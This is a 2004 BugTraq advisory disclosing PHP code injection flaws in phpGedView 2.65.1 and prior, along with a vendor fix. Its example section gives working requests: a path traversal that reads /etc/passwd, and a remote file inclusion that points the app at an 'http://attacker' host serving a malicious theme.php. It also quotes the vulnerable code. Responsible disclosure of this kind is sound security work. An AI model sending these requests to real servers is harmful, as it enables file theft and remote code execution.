BugTraq
PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior Jan 29 2004 11:27PM
Cedric Cochin (cco netvigilance com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior

########################################################################
########
Summary :

phpGedView is an open source system for online viewing Gedcom information
(family tree and genology information). Multiple PHP Code Injection
vulnerabilities exist in the phpGedView product. They enable a malicious user
to access arbitrary files or execute commands on the server.

########################################################################
########
Details :

Multiple PHP scripts can be exploited to perform PHP Code Injection.

Vulnerable Systems:
* phpGedView version 2.65.1 and prior

Release Date :
January 30, 2004

Severity :
HIGH

########################################################################
########
Examples :

-------------------------------------------

I - PHP Injection or arbitrary file access
(HIGH Risk BUT user must be Admin)

- -- HTTP Request --

http://[target]/[phpGedView-directory]/editconfig_gedcom.php?gedcom_conf
ig=../../../../../../etc/passwd
or
http://[target]/[phpGedView-directory]/editconfig_gedcom.php
POSTDATA: gedcom_config=../../../../../../etc/passwd

- -- HTTP Request --

Code impacted : editconfig_gedcom.php

61:if (empty($gedcom_config)) {
62: if (!empty($_POST["gedcom_config"])) $gedcom_config = $_POST["gedcom_config"];
63: else $gedcom_config = "config_gedcom.php";
64:}
65:
66:require($gedcom_config);

The both GET/POST requets will work evenif PHP register_globals is Off.

-------------------------------------------

II - PHP Injection
(HIGH Risk no authentication needed)

- -- HTTP Request --

http://[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BAS
E_DIRECTORY=http://attacker&THEME_DIR=/

- -- HTTP Request --

Code impacted : [GED_File]_conf.php

123:if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php")) require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");
124:else {
125: $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
126: require($THEME_DIR."theme.php");
127: }

The require call is only vulnerable when PHP register_globals is On.

In this case you have to obtain the name of the GEDCOM File used. Just perform
a http://[target]/session.php request the GEDCOM file will be in argument of the
login.php call.

The attacker has to create on his web site a directory call themes/standard, and
a file theme.php

For example: theme.php = <?php print "<?php phpinfo();?>" ;?>

and the request, will execute the phpinfo() command on the vulnerable target.

########################################################################
########
Vendor Status :

The information has been provided to John Finlay the PhpGedView Project Manager.
A new release 2.65.2 with fixes for these vulnerabilities is available.
- --> http://phpgedview.sourceforge.net/
- --> http://sourceforge.net/project/showfiles.php?group_id=55456&package_id=6
1562&release_id=141517

########################################################################
########
Credit :

Cedric Cochin, Security Engineer, netVigilance, inc.
< cco (at) netvigilance (dot) com [email concealed] >

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQFAGZbZA9/8vqmWoYQRAmVrAJ9rd9L6WkO5FV9ufaMYj5mhk0uMXwCePwxS
+hdjG8/IGk+yoZje7W1I110=
=Gfdz
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus